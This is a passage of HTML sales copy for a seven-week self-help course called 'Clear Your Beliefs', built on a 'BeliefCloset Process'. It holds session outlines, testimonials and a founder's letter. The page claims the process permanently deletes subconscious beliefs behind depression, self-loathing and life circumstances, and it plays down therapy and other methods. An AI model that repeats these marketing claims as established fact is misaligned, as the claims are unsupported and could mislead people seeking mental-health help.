patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" 